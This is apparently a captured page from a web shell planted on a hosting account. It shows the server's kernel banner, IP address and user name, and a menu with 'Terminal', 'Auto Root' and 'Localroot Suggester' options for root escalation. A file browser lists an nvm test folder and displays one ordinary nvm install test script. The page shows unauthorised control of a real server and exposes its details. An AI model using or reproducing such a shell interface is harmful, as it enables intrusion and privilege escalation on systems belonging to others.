Linux sg77.dns-private.com 5.14.0-503.40.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Mon May 5 06:06:04 EDT 2025 x86_64
LiteSpeed
Server IP : 135.181.230.13 & Your IP : 216.73.217.64
Domains :
Cant Read [ /etc/named.conf ]
User : pilasate
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
pilasate /
.nvm /
test /
xenial /
Delete
Unzip
Name
Size
Permission
Date
Action
install from source
834
B
-rwxrwxr-x
2025-06-22 16:20
install from source implicitly
587
B
-rwxrwxr-x
2025-06-22 16:20
install from source with thread parameter
950
B
-rwxrwxr-x
2025-06-22 16:20
install from source without V8 snapshot for ARM
762
B
-rwxrwxr-x
2025-06-22 16:20
install hook
1.37
KB
-rwxrwxr-x
2025-06-22 16:20
install version specified in .nvmrc from source
514
B
-rwxrwxr-x
2025-06-22 16:20
node 0.6.21 should install 0.6.21-pre
324
B
-rwxrwxr-x
2025-06-22 16:20
Save
Rename
#!/bin/sh set -ex die () { echo "$@" ; exit 1; } set +e # TODO: fix \. ../../nvm.sh set -e nvm deactivate || die 'deactivate failed' NVM_TEST_VERSION=v0.8.5 # Remove the stuff we're clobbering. nvm uninstall "${NVM_TEST_VERSION}" || die 'uninstall failed' # Install from source implicitly (v0.8.6 is when binaries started) nvm install $NVM_TEST_VERSION || die "'nvm install -s $NVM_TEST_VERSION' failed" # Check [ -d ../../$NVM_TEST_VERSION ] nvm run $NVM_TEST_VERSION --version | grep $NVM_TEST_VERSION || "'nvm run $NVM_TEST_VERSION --version | grep $NVM_TEST_VERSION' failed"